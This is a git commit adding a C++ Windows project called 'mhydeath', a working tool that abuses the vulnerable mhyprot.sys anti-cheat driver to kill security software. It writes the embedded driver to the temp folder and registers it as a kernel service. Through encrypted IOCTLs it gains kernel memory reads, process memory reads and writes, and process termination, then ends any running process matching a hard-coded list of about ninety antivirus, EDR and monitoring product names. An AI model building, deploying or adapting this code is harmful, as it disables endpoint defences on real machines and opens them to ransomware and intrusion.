Add project files.

This commit is contained in:
zero
2023-08-22 12:45:35 +05:30
parent 7813229fbc
commit 804fc4b668
17 changed files with 105370 additions and 0 deletions
+22
View File
@@ -0,0 +1,22 @@
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.6.33829.357
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mhydeath", "mhydeath\mhydeath.vcxproj", "{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Release|x64.ActiveCfg = Release|x64
{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Release|x64.Build.0 = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {74DDB47F-DFB2-4765-B988-8088E5131DB1}
EndGlobalSection
EndGlobal
+18
View File
@@ -0,0 +1,18 @@
#include "file_utils.h"
bool file_utils::create_file_from_buffer(const std::string_view file_path, void* buffer, size_t size)
{
std::ofstream stream(
file_path.data(),
std::ios_base::out | std::ios_base::binary
);
if (!stream.write((char*)buffer, size))
{
stream.close();
return false;
}
stream.close();
return true;
}
+10
View File
@@ -0,0 +1,10 @@
#pragma once
#include <Windows.h>
#include <string>
#include <fstream>
namespace file_utils
{
bool create_file_from_buffer(const std::string_view file_path, void* buffer, size_t size);
}
File diff suppressed because it is too large Load Diff
+45
View File
@@ -0,0 +1,45 @@
#include <iostream>
#include "mhyprotect/mhyprotect.h"
#include "mhydeath/process_killer.h"
//
// main entry point
//
int main(int argc, const char** argv)
{
//
// clean previous instances
//
mhyprotect::clean();
//
// initialize its service, etc
//
if (!mhyprotect::init())
{
printf("[!] failed to initialize vulnerable driver\n");
return -1;
}
//
// initialize driver implementations
//
if (!mhyprotect::driver_impl::driver_init())
{
printf("[!] failed to initialize driver properly\n");
mhyprotect::unload();
return -1;
}
//
// kill edr processes
//
process_killer::kill_target_processes();
//
// stop and delete service
//
mhyprotect::unload();
return 0;
}
+60
View File
@@ -0,0 +1,60 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="win_utils.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="mhyprot.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="service_utils.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="file_utils.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="raw_driver.hpp">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="logger.hpp">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="win_utils.hpp">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="mhyprot.hpp">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="service_utils.hpp">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="file_utils.hpp">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="nt.hpp">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="sup.hpp">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
</Project>
+77
View File
@@ -0,0 +1,77 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{0d17a4b4-a7c4-49c0-99e3-b856f9f3b271}</ProjectGuid>
<RootNamespace>mhyprotrootkit</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
<ProjectName>mhydeath</ProjectName>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<TargetName>$(ProjectName)64</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<LanguageStandard>stdcpp17</LanguageStandard>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="driver_utils\file_utils.cpp" />
<ClCompile Include="main.cpp" />
<ClCompile Include="mhydeath\process_killer.cpp" />
<ClCompile Include="mhyprotect\mhyprotect.cpp" />
<ClCompile Include="service_utils\service_utils.cpp" />
<ClCompile Include="win_utils\win_utils.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="driver_utils\file_utils.h" />
<ClInclude Include="driver_utils\raw_driver.h" />
<ClInclude Include="mhydeath\process_killer.h" />
<ClInclude Include="mhyprotect\mhyprotect.h" />
<ClInclude Include="service_utils\service_utils.h" />
<ClInclude Include="win_utils\nt.h" />
<ClInclude Include="win_utils\win_utils.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
+61
View File
@@ -0,0 +1,61 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<ClCompile Include="main.cpp" />
<ClCompile Include="driver_utils\file_utils.cpp">
<Filter>driver_utils</Filter>
</ClCompile>
<ClCompile Include="mhyprotect\mhyprotect.cpp">
<Filter>mhyprotect</Filter>
</ClCompile>
<ClCompile Include="win_utils\win_utils.cpp">
<Filter>win_utils</Filter>
</ClCompile>
<ClCompile Include="service_utils\service_utils.cpp">
<Filter>service_utils</Filter>
</ClCompile>
<ClCompile Include="mhydeath\process_killer.cpp">
<Filter>mhydeath</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="driver_utils\file_utils.h">
<Filter>driver_utils</Filter>
</ClInclude>
<ClInclude Include="driver_utils\raw_driver.h">
<Filter>driver_utils</Filter>
</ClInclude>
<ClInclude Include="mhyprotect\mhyprotect.h">
<Filter>mhyprotect</Filter>
</ClInclude>
<ClInclude Include="win_utils\win_utils.h">
<Filter>win_utils</Filter>
</ClInclude>
<ClInclude Include="win_utils\nt.h">
<Filter>win_utils</Filter>
</ClInclude>
<ClInclude Include="service_utils\service_utils.h">
<Filter>service_utils</Filter>
</ClInclude>
<ClInclude Include="mhydeath\process_killer.h">
<Filter>mhydeath</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<Filter Include="driver_utils">
<UniqueIdentifier>{9d335a62-86ee-45d5-913a-2555ee6a7d0c}</UniqueIdentifier>
</Filter>
<Filter Include="mhyprotect">
<UniqueIdentifier>{9fb3042c-aa4d-40f0-a84e-dc788f2e659f}</UniqueIdentifier>
</Filter>
<Filter Include="service_utils">
<UniqueIdentifier>{e9533c65-fd79-4f8d-ba04-d05b55af3c10}</UniqueIdentifier>
</Filter>
<Filter Include="win_utils">
<UniqueIdentifier>{6f02f3b9-0ae5-4320-bfdd-53bf1dc9e983}</UniqueIdentifier>
</Filter>
<Filter Include="mhydeath">
<UniqueIdentifier>{d516efcd-0802-4863-adfe-de1e200bcb73}</UniqueIdentifier>
</Filter>
</ItemGroup>
</Project>
+72
View File
@@ -0,0 +1,72 @@
#include "process_killer.h"
//
// convert string to lower case so we can compare incasesensitive
//
wchar_t* process_killer::to_lowercase(const wchar_t* str)
{
wchar_t* lower_str = _wcsdup(str);
for (int i = 0; lower_str[i]; i++)
lower_str[i] = towlower(lower_str[i]);
return lower_str;
}
//
// compare name against list
//
int process_killer::is_a_target(const wchar_t* name)
{
wchar_t* tempv = to_lowercase(name);
for (int i = 0; i < sizeof(process_list) / sizeof(process_list[0]); i++)
{
if (wcsstr(tempv, process_list[i]) != NULL)
{
free(tempv);
return 1;
}
}
free(tempv);
return 0;
}
//
// loop running processes and kill target processes
//
void process_killer::kill_target_processes()
{
DWORD pOutbuff = 0;
DWORD bytesRet = 0;
HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnap != INVALID_HANDLE_VALUE)
{
PROCESSENTRY32W ProcessEntry;
ProcessEntry.dwSize = sizeof(ProcessEntry);
if (Process32FirstW(hSnap, &ProcessEntry))
{
do
{
wchar_t exeName[MAX_PATH];
wcscpy_s(exeName, MAX_PATH, ProcessEntry.szExeFile);
if (process_killer::is_a_target(exeName))
{
if (mhyprotect::driver_impl::terminate_process(ProcessEntry.th32ProcessID)) {
wprintf(L"Killed process: %s \n", ProcessEntry.szExeFile);
}
else {
wprintf(L"Failed to kill: %s\n", ProcessEntry.szExeFile);
}
}
} while (Process32NextW(hSnap, &ProcessEntry));
}
CloseHandle(hSnap);
}
}
+53
View File
@@ -0,0 +1,53 @@
#pragma once
#include <iostream>
#include <Windows.h>
#include <tlhelp32.h>
#include "../mhyprotect/mhyprotect.h"
namespace process_killer {
//
// list of process names to kill
//
const wchar_t* const process_list[] =
{
L"activeconsole", L"anti malware", L"anti-malware",
L"antimalware", L"anti virus", L"anti-virus",
L"antivirus", L"appsense", L"authtap",
L"avast", L"avecto", L"canary",
L"carbonblack", L"carbon black", L"cb.exe",
L"ciscoamp", L"cisco amp", L"countercept",
L"countertack", L"cramtray", L"crssvc",
L"crowdstrike", L"csagent", L"csfalcon",
L"csshell", L"cybereason", L"cyclorama",
L"cylance", L"cyoptics", L"cyupdate",
L"cyvera", L"cyserver", L"cytray",
L"darktrace", L"defendpoint", L"defender",
L"eectrl", L"elastic", L"endgame",
L"f-secure", L"forcepoint", L"fireeye",
L"groundling", L"GRRservic", L"inspector",
L"ivanti", L"kaspersky", L"lacuna",
L"logrhythm", L"malware", L"mandiant",
L"mcafee", L"morphisec", L"msascuil",
L"msmpeng", L"nissrv", L"omni",
L"omniagent", L"osquery", L"palo alto networks",
L"pgeposervice", L"pgsystemtray", L"privilegeguard",
L"procwall", L"protectorservic", L"qradar",
L"redcloak", L"secureworks", L"securityhealthservice",
L"semlaunchsv", L"sentinel", L"sepliveupdat",
L"sisidsservice", L"sisipsservice", L"sisipsutil",
L"smc.exe", L"smcgui", L"snac64",
L"sophos", L"splunk", L"srtsp",
L"symantec", L"symcorpu", L"symefasi",
L"sysinternal", L"sysmon", L"tanium",
L"tda.exe", L"tdawork", L"tpython",
L"vectra", L"wincollect", L"windowssensor",
L"wireshark", L"threat", L"xagt.exe",
L"xagtnotif.exe", L"mssense"
};
wchar_t* to_lowercase(const wchar_t* str);
int is_a_target(const wchar_t* name);
void kill_target_processes();
}
+241
View File
@@ -0,0 +1,241 @@
#include "mhyprotect.h"
//
// initialization of its service and device
//
bool mhyprotect::init()
{
char temp_path[MAX_PATH];
const uint32_t length = GetTempPath(sizeof(temp_path), temp_path);
if (length > MAX_PATH || !length)
return false;
//
// place the driver binary into the temp path
//
const std::string placement_path = std::string(temp_path) + MHYPROT_SYSFILE_NAME;
if (std::filesystem::exists(placement_path))
std::remove(placement_path.c_str());
//
// create driver sys from memory
//
if (!file_utils::create_file_from_buffer(placement_path, (void*)resource::raw_driver, sizeof(resource::raw_driver)))
return false;
//
// create service using winapi, this needs administrator privileage
//
detail::mhyplot_service_handle = service_utils::create_service(placement_path);
if (!CHECK_HANDLE(detail::mhyplot_service_handle))
return false;
//
// start the service
//
if (!service_utils::start_service(detail::mhyplot_service_handle))
return false;
//
// open the handle of its driver device
//
detail::device_handle = CreateFile(TEXT(MHYPROT_DEVICE_NAME), GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, NULL, NULL);
if (!CHECK_HANDLE(detail::device_handle))
return false;
return true;
}
void mhyprotect::unload()
{
if (detail::device_handle)
{
CloseHandle(detail::device_handle);
}
if (detail::mhyplot_service_handle)
{
service_utils::stop_service(detail::mhyplot_service_handle);
service_utils::delete_service(detail::mhyplot_service_handle);
}
}
void mhyprotect::clean()
{
service_utils::delete_service_with_check(MHYPROT_SERVICE_NAME);
}
bool mhyprotect::driver_impl::request_ioctl(DWORD ioctl_code, LPVOID in_buffer, DWORD in_buffer_size)
{
//
// allocate memory for this command result
//
LPVOID out_buffer = calloc(1, in_buffer_size);
DWORD out_buffer_size;
if (!out_buffer)
return false;
//
// send the ioctl request
//
const bool result = DeviceIoControl(mhyprotect::detail::device_handle, ioctl_code, in_buffer, in_buffer_size, out_buffer, in_buffer_size, &out_buffer_size, NULL);
//
// store the result
//
if (out_buffer_size)
memcpy(in_buffer, out_buffer, out_buffer_size);
free(out_buffer);
return result;
}
//
// initialize driver implementations with payload encryption requirements
//
bool mhyprotect::driver_impl::driver_init()
{
//
// the driver initializer
//
MHYPROT_INITIALIZE initializer;
initializer._m_002 = 0x0BAEBAEEC;
initializer._m_003 = 0x0EBBAAEF4FFF89042;
if (!request_ioctl(MHYPROT_IOCTL_INITIALIZE, &initializer, sizeof(initializer)))
return false;
//
// driver's base address in the system
//
uint64_t mhyprot_address = win_utils::obtain_sysmodule_address(MHYPROT_SYSFILE_NAME);
if (!mhyprot_address)
return false;
//
// read the pointer that points to the seedmap that used to encrypt payloads
// the pointer on the [driver.sys + 0xA0E8]
//
uint64_t seedmap_address = driver_impl::read_kernel_memory<uint64_t>(mhyprot_address + MHYPROT_OFFSET_SEEDMAP);
if (!seedmap_address)
return false;
if (!driver_impl::read_kernel_memory(seedmap_address, &detail::seedmap, sizeof(detail::seedmap)))
{
return false;
}
return true;
}
//
// generate a key for the payload
//
uint64_t mhyprotect::driver_impl::generate_key(uint64_t seed)
{
uint64_t k = ((((seed >> 29) & 0x555555555 ^ seed) & 0x38EB3FFFF6D3) << 17) ^ (seed >> 29) & 0x555555555 ^ seed;
return ((k & 0xFFFFFFFFFFFFBF77u) << 37) ^ k ^ ((((k & 0xFFFFFFFFFFFFBF77u) << 37) ^ k) >> 43);
}
//
// encrypt the payload
//
void mhyprotect::driver_impl::encrypt_payload(void* payload, size_t size)
{
if (size % 8)
return;
if (size / 8 >= 312)
return;
uint64_t* p_payload = (uint64_t*)payload;
DWORD64 key_to_base = 0;
for (DWORD i = 1; i < size / 8; i++)
{
const uint64_t key = driver_impl::generate_key(detail::seedmap[i - 1]);
p_payload[i] = p_payload[i] ^ key ^ (key_to_base + p_payload[0]);
key_to_base += 0x10;
}
}
//
// read memory from the kernel using vulnerable ioctl
//
bool mhyprotect::driver_impl::read_kernel_memory(uint64_t address, void* buffer, size_t size)
{
if (!buffer)
return false;
DWORD payload_size = size + sizeof(DWORD);
PMHYPROT_KERNEL_READ_REQUEST payload = (PMHYPROT_KERNEL_READ_REQUEST)calloc(1, payload_size);
if (!payload)
return false;
payload->header.address = address;
payload->size = size;
if (!request_ioctl(MHYPROT_IOCTL_READ_KERNEL_MEMORY, payload, payload_size))
return false;
if (!payload->header.result)
{
memcpy(buffer, (PUCHAR)payload + 4, size);
return true;
}
return false;
}
bool mhyprotect::driver_impl::terminate_process(const uint32_t process_id)
{
MHYPROT_TERMINATE_PROCESS_REQUEST payload;
payload.process_id = process_id;
encrypt_payload(&payload, sizeof(payload));
if (!request_ioctl(MHYPROT_IOCTL_TERMINATE_PROCESS, &payload, sizeof(payload)) || !payload.response)
return false;
return true;
}
bool mhyprotect::driver_impl::read_user_memory(uint32_t process_id, uint64_t address, void* buffer, size_t size)
{
MHYPROT_USER_READ_WRITE_REQUEST payload;
payload.action = MHYPROT_ACTION_READ; // action code
payload.process_id = process_id; // target process id
payload.address = address; // address
payload.buffer = (uint64_t)buffer; // our buffer
payload.size = size; // size
encrypt_payload(&payload, sizeof(payload));
return request_ioctl(MHYPROT_IOCTL_READ_WRITE_USER_MEMORY, &payload, sizeof(payload));
}
bool mhyprotect::driver_impl::write_user_memory(uint32_t process_id, uint64_t address, void* buffer, size_t size)
{
MHYPROT_USER_READ_WRITE_REQUEST payload;
payload.action = MHYPROT_ACTION_WRITE; // action code
payload.process_id = process_id; // target process id
payload.address = (uint64_t)buffer; // our buffer
payload.buffer = address; // destination
payload.size = size; // size
encrypt_payload(&payload, sizeof(payload));
return request_ioctl(MHYPROT_IOCTL_READ_WRITE_USER_MEMORY, &payload, sizeof(payload));
}
+111
View File
@@ -0,0 +1,111 @@
#pragma once
#include <Windows.h>
#include <fstream>
#include <filesystem>
#include "../driver_utils/raw_driver.h"
#include "../driver_utils/file_utils.h"
#include "../service_utils/service_utils.h"
#define MHYPROT_SERVICE_NAME "mhyprotect"
#define MHYPROT_DISPLAY_NAME "mhyprotect"
#define MHYPROT_SYSFILE_NAME "mhyprot.sys"
#define MHYPROT_DEVICE_NAME "\\\\?\\\\mhyprotect"
#define MHYPROT_IOCTL_INITIALIZE 0x80034000
#define MHYPROT_IOCTL_READ_KERNEL_MEMORY 0x83064000
#define MHYPROT_IOCTL_READ_WRITE_USER_MEMORY 0x81074000
#define MHYPROT_IOCTL_ENUM_PROCESS_MODULES 0x82054000
#define MHYPROT_IOCTL_GET_SYSTEM_UPTIME 0x80134000
#define MHYPROT_IOCTL_ENUM_PROCESS_THREADS 0x83024000
#define MHYPROT_IOCTL_TERMINATE_PROCESS 0x81034000
#define MHYPROT_ACTION_READ 0x0
#define MHYPROT_ACTION_WRITE 0x1
#define MHYPROT_OFFSET_SEEDMAP 0xA0E8
namespace mhyprotect
{
typedef struct _MHYPROT_INITIALIZE
{
DWORD _m_001;
DWORD _m_002;
DWORD64 _m_003;
} MHYPROT_INITIALIZE, *PMHYPROT_INITIALIZE;
typedef struct _MHYPROT_KERNEL_READ_REQUEST
{
union _HEADER
{
DWORD result;
DWORD64 address;
} header;
ULONG size;
} MHYPROT_KERNEL_READ_REQUEST, *PMHYPROT_KERNEL_READ_REQUEST;
typedef struct _MHYPROT_USER_READ_WRITE_REQUEST
{
DWORD64 random_key;
DWORD action;
DWORD unknown_00;
DWORD process_id;
DWORD unknown_01;
DWORD64 buffer;
DWORD64 address;
ULONG size;
ULONG unknown_02;
} MHYPROT_USER_READ_WRITE_REQUEST, *PMHYPROT_USER_READ_WRITE_REQUEST;
typedef struct _MHYPROT_TERMINATE_PROCESS_REQUEST
{
uint64_t response;
uint32_t process_id;
} MHYPROT_TERMINATE_PROCESS_REQUEST, * PMHYPROT_TERMINATE_PROCESS_REQUEST;
namespace detail
{
inline HANDLE device_handle;
inline uint64_t seedmap[312];
inline SC_HANDLE mhyplot_service_handle;
}
bool init();
void unload();
void clean();
namespace driver_impl
{
bool request_ioctl(DWORD ioctl_code, LPVOID in_buffer, DWORD in_buffer_size);
bool driver_init();
uint64_t generate_key(uint64_t seed);
void encrypt_payload(void* payload, size_t size);
bool read_kernel_memory(uint64_t address, void* buffer, size_t size);
template<class T> __forceinline T read_kernel_memory(uint64_t address)
{
T buffer;
read_kernel_memory(address, &buffer, sizeof(T));
return buffer;
}
bool read_user_memory(uint32_t process_id, uint64_t address, void* buffer, size_t size);
template<class T> __forceinline T read_user_memory(uint32_t process_id, uint64_t address)
{
T buffer;
read_user_memory(process_id, address, &buffer, sizeof(T));
return buffer;
}
bool write_user_memory(uint32_t process_id, uint64_t address, void* buffer, size_t size);
template<class T> __forceinline bool write_user_memory(uint32_t process_id, uint64_t address, T value)
{
return write_user_memory(process_id, address, &value, sizeof(T));
}
bool terminate_process(const uint32_t process_id);
}
}
+156
View File
@@ -0,0 +1,156 @@
#include "service_utils.h"
//
// open service control manager to operate services
//
SC_HANDLE service_utils::open_sc_manager()
{
return OpenSCManager(nullptr, nullptr, SC_MANAGER_CREATE_SERVICE);
}
//
// create a new service
// sc create myservice binPath="" type=kernel
//
SC_HANDLE service_utils::create_service(const std::string_view driver_path)
{
SC_HANDLE sc_manager_handle = open_sc_manager();
CHECK_SC_MANAGER_HANDLE(sc_manager_handle, (SC_HANDLE)INVALID_HANDLE_VALUE);
SC_HANDLE mhyprot_service_handle = CreateService(
sc_manager_handle,
MHYPROT_SERVICE_NAME,
MHYPROT_DISPLAY_NAME,
SERVICE_START | SERVICE_STOP | DELETE,
SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE,
driver_path.data(), nullptr, nullptr, nullptr, nullptr, nullptr
);
if (!CHECK_HANDLE(mhyprot_service_handle))
{
const auto last_error = GetLastError();
if (last_error == ERROR_SERVICE_EXISTS)
{
printf("Service already exists, open handle\n");
return OpenService(
sc_manager_handle,
MHYPROT_SERVICE_NAME,
SERVICE_START | SERVICE_STOP | DELETE
);
}
printf(("Failed to create %s service. (0x%lX)\n"), MHYPROT_SERVICE_NAME, GetLastError());
CloseServiceHandle(sc_manager_handle);
return (SC_HANDLE)(INVALID_HANDLE_VALUE);
}
CloseServiceHandle(sc_manager_handle);
return mhyprot_service_handle;
}
bool service_utils::delete_service_with_check(const std::string_view service_name)
{
SC_HANDLE sc_manager_handle = open_sc_manager();
CHECK_SC_MANAGER_HANDLE(sc_manager_handle, false);
SC_HANDLE service_handle = OpenService(
sc_manager_handle,
service_name.data(),
SERVICE_STOP | DELETE
);
if (!CHECK_HANDLE(service_handle))
{
CloseServiceHandle(sc_manager_handle);
return false; // Service does not exist
}
SERVICE_STATUS service_status = {};
if (!ControlService(service_handle, SERVICE_CONTROL_STOP, &service_status))
{
CloseServiceHandle(service_handle);
CloseServiceHandle(sc_manager_handle);
return false; // Failed to stop service
}
if (!DeleteService(service_handle))
{
CloseServiceHandle(service_handle);
CloseServiceHandle(sc_manager_handle);
return false; // Failed to delete service
}
CloseServiceHandle(service_handle);
CloseServiceHandle(sc_manager_handle);
return true; // Successfully stopped and deleted service
}
//
// delete the service
// sc delete myservice
//
bool service_utils::delete_service(SC_HANDLE service_handle, bool close_on_fail, bool close_on_success)
{
SC_HANDLE sc_manager_handle = open_sc_manager();
CHECK_SC_MANAGER_HANDLE(sc_manager_handle, false);
if (!DeleteService(service_handle))
{
const auto last_error = GetLastError();
if (last_error == ERROR_SERVICE_MARKED_FOR_DELETE)
{
CloseServiceHandle(sc_manager_handle);
return true;
}
CloseServiceHandle(sc_manager_handle);
if (close_on_fail) CloseServiceHandle(service_handle);
return false;
}
CloseServiceHandle(sc_manager_handle);
if (close_on_success) CloseServiceHandle(service_handle);
return true;
}
//
// start the service
// sc start myservice
//
bool service_utils::start_service(SC_HANDLE service_handle)
{
return StartService(service_handle, 0, nullptr);
}
//
// stop the service
// sc stop myservice
//
bool service_utils::stop_service(SC_HANDLE service_handle)
{
SC_HANDLE sc_manager_handle = open_sc_manager();
CHECK_SC_MANAGER_HANDLE(sc_manager_handle, false);
SERVICE_STATUS service_status;
if (!ControlService(service_handle, SERVICE_CONTROL_STOP, &service_status))
{
CloseServiceHandle(sc_manager_handle);
return false;
}
CloseServiceHandle(sc_manager_handle);
return true;
}
+26
View File
@@ -0,0 +1,26 @@
#pragma once
#include <Windows.h>
#include <string>
#include "../win_utils/win_utils.h"
#include "../mhyprotect/mhyprotect.h"
#define CHECK_SC_MANAGER_HANDLE(x, ret_type) \
if (!CHECK_HANDLE(x)) \
{ \
return ret_type; \
} \
namespace service_utils
{
SC_HANDLE open_sc_manager();
SC_HANDLE create_service(const std::string_view driver_path);
bool delete_service(SC_HANDLE service_handle, bool close_on_fail = true, bool close_on_success = true);
bool delete_service_with_check(const std::string_view service_name);
bool start_service(SC_HANDLE service_handle);
bool stop_service(SC_HANDLE service_handle);
}
+158
View File
@@ -0,0 +1,158 @@
#pragma once
#include <Windows.h>
//
// windows native definitions
//
#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#endif
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)
#define STATUS_NOT_IMPLEMENTED ((NTSTATUS)0xC0000002L)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_INVALID_CID ((NTSTATUS)0xC000000BL)
#define STATUS_NO_SUCH_DEVICE ((NTSTATUS)0xC000000EL)
#define STATUS_NO_SUCH_FILE ((NTSTATUS)0xC000000FL)
#define STATUS_INVALID_DEVICE_REQUEST ((NTSTATUS)0xC0000010L)
#define STATUS_MORE_PROCESSING_REQUIRED ((NTSTATUS)0xC0000016L)
#define STATUS_CONFLICTING_ADDRESSES ((NTSTATUS)0xC0000018L)
#define STATUS_NO_MORE_ENTRIES ((NTSTATUS)0x8000001AL)
#define STATUS_BUFFER_TOO_SMALL ((NTSTATUS)0xC0000023L)
#define STATUS_INVALID_PAGE_PROTECTION ((NTSTATUS)0xC0000045L)
#define STATUS_PROCEDURE_NOT_FOUND ((NTSTATUS)0xC000007AL)
#define STATUS_INSUFFICIENT_RESOURCES ((NTSTATUS)0xC000009AL)
#define STATUS_INSTRUCTION_MISALIGNMENT ((NTSTATUS)0xC00000AAL)
#define STATUS_INTERNAL_ERROR ((NTSTATUS)0xC00000E5L)
#define STATUS_INVALID_PARAMETER_1 ((NTSTATUS)0xC00000EFL)
#define STATUS_INVALID_PARAMETER_2 ((NTSTATUS)0xC00000F0L)
#define STATUS_INVALID_PARAMETER_3 ((NTSTATUS)0xC00000F1L)
#define STATUS_INVALID_PARAMETER_4 ((NTSTATUS)0xC00000F2L)
#define STATUS_INVALID_PARAMETER_5 ((NTSTATUS)0xC00000F3L)
#define STATUS_INVALID_PARAMETER_6 ((NTSTATUS)0xC00000F4L)
#define STATUS_INVALID_PARAMETER_7 ((NTSTATUS)0xC00000F5L)
#define STATUS_INVALID_PARAMETER_8 ((NTSTATUS)0xC00000F6L)
#define STATUS_INVALID_PARAMETER_9 ((NTSTATUS)0xC00000F7L)
#define STATUS_INVALID_PARAMETER_10 ((NTSTATUS)0xC00000F8L)
#define STATUS_INVALID_PARAMETER_11 ((NTSTATUS)0xC00000F9L)
#define STATUS_INVALID_PARAMETER_12 ((NTSTATUS)0xC00000FAL)
#define STATUS_INVALID_ADDRESS ((NTSTATUS)0xC0000141L)
#define STATUS_DATATYPE_MISALIGNMENT_ERROR ((NTSTATUS)0xC00002C5L)
typedef enum _SYSTEM_INFORMATION_CLASS
{
SystemBasicInformation = 0,
SystemProcessorInformation = 1,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3,
SystemPathInformation = 4,
SystemProcessInformation = 5,
SystemCallCountInformation = 6,
SystemDeviceInformation = 7,
SystemProcessorPerformanceInformation = 8,
SystemFlagsInformation = 9,
SystemCallTimeInformation = 10,
SystemModuleInformation = 11,
SystemLocksInformation = 12,
SystemStackTraceInformation = 13,
SystemPagedPoolInformation = 14,
SystemNonPagedPoolInformation = 15,
SystemHandleInformation = 16,
SystemObjectInformation = 17,
SystemPageFileInformation = 18,
SystemVdmInstemulInformation = 19,
SystemVdmBopInformation = 20,
SystemFileCacheInformation = 21,
SystemPoolTagInformation = 22,
SystemInterruptInformation = 23,
SystemDpcBehaviorInformation = 24,
SystemFullMemoryInformation = 25,
